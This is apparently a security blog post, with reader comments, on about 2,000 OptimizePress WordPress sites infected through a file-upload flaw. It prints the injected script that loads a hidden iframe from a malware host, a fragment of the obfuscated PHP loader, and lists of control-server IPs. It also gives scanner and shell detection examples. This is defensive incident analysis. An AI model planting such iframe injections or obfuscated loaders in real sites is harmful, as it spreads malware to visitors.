A few weeks ago we wrote about a file upload vulnerability in the OptimizePress theme. We were seeing a few sites being compromised by it, but nothing major.
That all changed yesterday when we detected roughly 2,000 websites compromised with iframes that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleaned were using OptimizePress, and they all had the same iframe injected in them:
<script>if(document.all){document.write("<iframe src='httx://gezidotojyk.org/ohui.cgi?19' width='1' height='1'></iframe>")}</script>
We also see that Google has started to blacklist the compromised sites, and just for this one iframe variation from gezidotojyk.org, they blacklisted almost 1,500 sites:
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gezidotojyk.org appeared to function as an intermediary for the infection of 1442 site(s) including dalluva.com/, criesaude.com/, brownstonefitness.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1382 domain(s), including dalluva.com/, criesaude.com/, pathtoawesome.com/.
Searching For This iFrame
You shouldn’t even bother searching for this iframe, or the normal “eval” injections you may see. This malware is a lot smarter, hiding itself using multiple encoding variations, and looks similar to this:
$UigPzaGqpe6SKfF= array('5362','5379','5358','5369');$NBfWJmicev5SrqsFzzlYzRfOVbwwh2pZtvM2H= array('2596','2611','2598','2594','2613','2598','2592','2599','2614','2607','2596','2613','2602','2608','2607');$jLf0uwhN2GcduBVAgHBD3JvjyPEaIcVDO1u8oBLg7Nksf6S= array('6978','6977','6995','6981','6934','6932','6975','6980','6981','6979','6991','6980','6981');$EEvXCh2Cm5rvV..
When decoded, the code behind these arrays contacts the malware “mothership” at one of the IP addresses below to fetch the updated injection. If you have been hit, take a look at your theme and plugin files; you will likely find all of them injected with a similar payload. For ISPs, here are the mothership IP addresses that can be blocked:
$know[] = "151.236.14.86"; $know[] = "149.154.157.133"; $know[] = "37.235.54.48"; $know[] = "31.215.205.196";
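Because the injected code is re-encoded per file, a practitioner wants to hunt for its shape rather than for one literal string. The scanner below is an added example, not Sucuri's tooling: it walks a WordPress tree and flags three indicators taken from this post, a PHP array built from short numeric string literals, a 1x1 iframe written by document.write, and any of the four mothership IPs listed above. The sample files it scans are constructed in a temporary directory (the array is the second one quoted above, the iframe points at a placeholder host), and the regex thresholds are assumptions that you would tune on a real install.

```python
import re
import tempfile
from pathlib import Path

# Heuristic 1: a PHP array made only of short numeric string literals,
# the shape of the encoded payload quoted in the post (threshold assumed).
NUMERIC_ARRAY_RE = re.compile(
    r"array\(\s*(?:['\"]\d{3,5}['\"]\s*,\s*){8,}['\"]\d{3,5}['\"]\s*\)"
)
# Heuristic 2: a 1x1 iframe written from JavaScript, as in the injected snippet.
HIDDEN_IFRAME_RE = re.compile(
    r"document\.write\s*\(.*?<iframe[^>]*?width=['\"]?1['\"]?[^>]*?height=['\"]?1['\"]?",
    re.IGNORECASE | re.DOTALL,
)
# Heuristic 3: the initial "mothership" addresses listed in the post.
MOTHERSHIP_IPS = {"151.236.14.86", "149.154.157.133",
                  "37.235.54.48", "31.215.205.196"}
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def scan_text(rel_path, text):
    """Return (path, reason) tuples for every indicator found in one file."""
    findings = []
    if NUMERIC_ARRAY_RE.search(text):
        findings.append((rel_path, "numeric-string array (encoded payload)"))
    if HIDDEN_IFRAME_RE.search(text):
        findings.append((rel_path, "hidden 1x1 iframe written by script"))
    hits = MOTHERSHIP_IPS.intersection(IP_RE.findall(text))
    if hits:
        findings.append((rel_path, "mothership IP: " + ", ".join(sorted(hits))))
    return findings


def scan_tree(root):
    """Walk a WordPress install and collect indicators from PHP/JS/HTML files."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in (".php", ".js", ".html"):
            text = path.read_text(errors="replace")
            findings.extend(scan_text(path.relative_to(root).as_posix(), text))
    return findings


def build_sample_tree():
    """Constructed sample files (not real site data) for an offline run."""
    root = Path(tempfile.mkdtemp())
    theme = root / "wp-content/themes/demo"
    theme.mkdir(parents=True)
    # Encoded array copied from the post, one IP from its blocklist and a
    # defanged 1x1 iframe writer modelled on the injected snippet.
    (theme / "header.php").write_text(
        "<?php $NBfWJmicev5SrqsFzzlYzRfOVbwwh2pZtvM2H= array('2596','2611',"
        "'2598','2594','2613','2598','2592','2599','2614','2607','2596','2613',"
        "'2602','2608','2607'); $know[] = \"151.236.14.86\"; ?>\n"
        "<script>if(document.all){document.write(\"<iframe src='httx://"
        "example.invalid/x.cgi' width='1' height='1'></iframe>\")}</script>\n"
    )
    (theme / "functions.php").write_text(
        "<?php $sizes = array('small', 'large'); // clean file ?>\n"
    )
    return root


if __name__ == "__main__":
    for rel_path, reason in scan_tree(build_sample_tree()):
        print(f"{rel_path}: {reason}")
```

Point `scan_tree` at a real document root instead of `build_sample_tree()` to use it; a hit on the numeric-array heuristic is the one most worth acting on, since legitimate themes rarely keep long arrays of bare numeric strings.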
Protection and Recovery
You need to update OptimizePress installations ASAP to prevent reinfections.
Clients using our website firewall are already protected.
The Sucuri Research Team is also analyzing the injections and we will post more details when we learn them.
20 comments
Could you be so kind and state that the vulnerability was present in OptimizePress version 1 and was fixed in version 1.62 in April, 2013. OptimizePress 2 is based on an entirely new secure code base.
I concur! This post will cause a lot of confusion for folks who have already updated to OP 1.62
What version of optimizepress is the ‘safe’ one? 1.61 or 1.62. I’m indeed confused.
You know, I’m not exactly sure. I just updated to 1.62. Contact OptimizePress and find out
1.62 is secure
hello conforest, the current version on the download page of OptimizePress is 1.64 as of april 03, 2014. so this follows its already fixed? pls confirm, thanks!
Yes, all versions after 1.61 are secure
thanks! back to work and cleaning the entire host now
Yes it’s happened overnight to one of our sites. As per Codeforest will upgrading OptimizePress version 1 work or does it need to be V2?
Fixed version is OptimizePress 1.61 (released in April 2013), current version of OptimizePress 1 is 1.62.
OptimizePress 2 was never affected with this vulnerability.
Nice Discovery, Impressive
I was provided the suspicious snippet in the Google Webmaster tools, and found your write up on the issue, but to my surprise I don’t have OptimizePress in my list of plugins in wordpress. Am I missing something?
Note that the IP list as mentioned on this page is only valid for the initial connection attempt. Once an infected server has connected to a ‘mothership’ it will also retrieve a list of new IP addresses and will use those as the new mothership addresses.
At the moment those addresses are (freshly retrieved from a ‘mothership’ just minutes ago):
5.149.250.150
31.215.205.196
37.235.48.74
37.235.54.48
46.21.146.152
85.159.237.231
91.200.14.122
94.76.220.90
95.85.39.230
109.206.165.95
144.76.232.49
146.0.79.182
149.154.152.129
149.154.157.133
151.236.14.86
158.255.215.135
178.21.23.230
188.66.5.127
192.243.126.38
Well it looks as if OP 2.0 is now infected too. My site worked fine earlier this evening and now all I see is the word “array.” Any ideas how I can clean the site from this malware?
Nice ideas.
My Optimize Press site is infected (whenever I load the site for the first time, there’s a legend about displaying cookies, whatever you click -accept or decline- then a link appears) and I always update as soon as there’s a new release.
Problem is, MediaTemple were “kind enough” to let me know they can’t do anything about it or charge me with $175 to have it fixed.
Needless to say, I moved from Hostgator to get superior support and a friend of mine who is hosted with HG and was having the same exact problem, got it fixed for FREE by the HG guys.
The irony on this one is KILLING ME.
We’ve been seeing this with a customer using OptimizePress. A major issue is that they use add-on domains in cPanel under a single cPanel account (despite having their own dedicated server). As a result, every add-on domain in the account was hit.
Another thing we found is hackers uploading PHP shell backdoors. These files can be spotted by having PHP files in various upload/cache directories.
We have some initial evidence that attackers are uploading these backdoors and then using them later to re-exploit the server — even after you’ve patched things up.
Unfortunately, remote scanning does not detect these files. We’ve had to use various on-server scanning tools as well as manually searching for certain string patterns in the code injections.
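The check this comment describes, PHP files sitting in upload or cache directories where no PHP belongs, is easy to run on the server itself. The helper below is an added example, not the commenter's or Sucuri's script; it builds a constructed sample tree under a temporary directory so it runs offline, and the `find_suspect_php` name and the `uploads`/`cache` path patterns are assumptions you would extend with your own plugin's cache locations.

```shell
#!/bin/sh
# Hypothetical helper (not from the post): list PHP files under
# wp-content upload and cache directories, a common place for dropped backdoors.
find_suspect_php() {
    # $1 = WordPress document root
    find "$1/wp-content" -type f -name '*.php' \
        \( -path '*/uploads/*' -o -path '*/cache/*' \) 2>/dev/null | sort
}

# Constructed sample tree so the helper can be exercised offline.
SAMPLE_ROOT=$(mktemp -d)
mkdir -p "$SAMPLE_ROOT/wp-content/uploads/2014/04" \
         "$SAMPLE_ROOT/wp-content/cache" \
         "$SAMPLE_ROOT/wp-content/themes/demo"
# A PHP file where only media should live (placeholder content, not a real shell).
printf '<?php // constructed placeholder\n' > "$SAMPLE_ROOT/wp-content/uploads/2014/04/image.php"
# Non-PHP cache output and a legitimate theme file must not be reported.
printf 'cached page\n' > "$SAMPLE_ROOT/wp-content/cache/page.html"
printf '<?php // legitimate theme file\n' > "$SAMPLE_ROOT/wp-content/themes/demo/functions.php"

find_suspect_php "$SAMPLE_ROOT"
```

Run it as `find_suspect_php /home/site` against a real account; every path it prints deserves a manual look, since WordPress itself never writes PHP into those directories.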
Thanks for posting this. I’ve been fighting this for a while. I have 1 site on a windows server that used the pre-patched version of OptimizePress. The infection spread to other wordpress sites not using optimizepress that are on the same server.
I found the infection by searching for this string: =');?> It’s at the end of the encrypted php that gets put in files such as index.php, wp-config.php, etc. If you do a text search on *.php files looking for that string you will find the infected sites.
I cleaned all this up several weeks ago, only to find that the site with OptimizePress had become infected again. It had not infected other sites yet. It left a php file in the root of the site with a name I didn’t recognize and that’s where I found the ip addresses that when searched on led me to this blog post. After reading this post, I updated OptimizePress.
What else does this infection put on the server? My server stops responding several times a day for about 2 minutes and then is fine until the next hang up. What else can I use to find code this exploit uses?
Just got this message when deleting a hacked site with OptimizePress:
Removing User & Group…….Success…Done
rm: cannot remove `/public_html/wp-content/plugins/optimizePressPlugin/lib/assets/tpls/feature_box_creator/searchinfo.php': Operation not permitted
rm: cannot remove `public_html/wp-content/plugins/optimizePressPlugin/lib/assets/tpls/feature_box_creator/.frsdfg': Operation not permitted
Is this proof that hacked got in from OptimizePress plugin??